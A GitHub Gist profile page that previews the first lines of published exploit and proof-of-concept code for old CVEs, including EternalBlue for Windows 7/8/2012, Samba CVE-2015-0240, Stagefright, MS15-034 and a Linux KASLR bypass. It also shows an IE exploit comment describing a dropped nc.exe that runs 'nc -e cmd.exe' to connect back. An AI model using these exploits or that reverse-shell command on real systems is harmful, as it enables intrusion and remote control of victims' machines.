Skip to content

Instantly share code, notes, and snippets.

View worawit's full-sized avatar

Worawit Wangwarunyoo worawit

View GitHub Profile
@worawit
worawit / ildumper_script_reader.py
Last active December 6, 2019 21:08
ghidra script for read script.py from Il2CppDumper
# -*- coding: utf-8 -*-
import ghidra.program.model.symbol.SourceType
import re
functionManager = currentProgram.getFunctionManager()
#minAddress = currentProgram.getMinAddress()
baseAddress = currentProgram.getImageBase()
USER_DEFINED = ghidra.program.model.symbol.SourceType.USER_DEFINED
/*
This PoC is based on http://www.immunityinc.com/downloads/x86leaks_old.pdf
The PoC finds direct physical map and kernel text address in Linux kernel without PTI on Intel x64.
The PoC might not work correctly in VM. For example, this PoC cannot find correct direct physical map
address in KVM. The reason is in https://www.kernel.org/doc/Documentation/virtual/kvm/mmu.txt
$ ./break_linux_kaslr_nopti
@worawit
worawit / eternalblue_merge_shellcode.py
Last active April 3, 2024 12:25
Windows x64 and x86 kernel shellcode for eternalblue exploit
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
import sys
from struct import pack
if len(sys.argv) < 4:
print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
sys.exit()
sc_x86 = open(sys.argv[1], 'rb').read()
sc_x64 = open(sys.argv[2], 'rb').read()
@worawit
worawit / eternalblue8_exploit.py
Last active March 16, 2024 18:38
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@worawit
worawit / eternalblue7_exploit.py
Last active July 11, 2024 13:36
Eternalblue exploit for Windows 7/2008
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
#!/usr/bin/python
"""
Stagefright PoC for https://android.googlesource.com/platform/frameworks/av/+/2b50b7aa7d16014ccf35db7a7b4b5e84f7b4027c
"""
from struct import pack
def create_box(atom_type, data):
return pack("!I", len(data)+4+4) + atom_type + data
@worawit
worawit / http_sys_pseudo.c
Last active July 30, 2021 04:18
MS15-034 (CVE-2015-1635) PoCs
/*
Pseudo code in HTTP.sys to understand flow related to MS15-034
All pseudo code are reversed from vulnerable HTTP.sys on Windows 7 SP1 x86
For anyone want to know what function are patched.
Just open patched version and find all functions reference to RtlULongLongAdd().
*/
@worawit
worawit / cve-2015-0240_samba_exploit.py
Created April 10, 2015 14:48
Exploit for Samba vulnerabilty (CVE-2015-0240)
#!/usr/bin/python
"""
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya
The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value on 'creds' address.
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
@worawit
worawit / cve-2015-0240_samba_poc
Last active March 30, 2024 15:03
PoC for Samba vulnerabilty (CVE-2015-0240)
#!/usr/bin/python
"""
PoC for Samba vulnerabilty (CVE-2015-0240) by sleepya
This PoC does only triggering the bug
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
#################
Exploitability against CentOS/Ubuntu binaries
@worawit
worawit / cve-2014-6332_exploit.html
Last active March 30, 2024 15:02
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in javascript below determined the connect back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windoes 8.1 64-bit (EPM is off)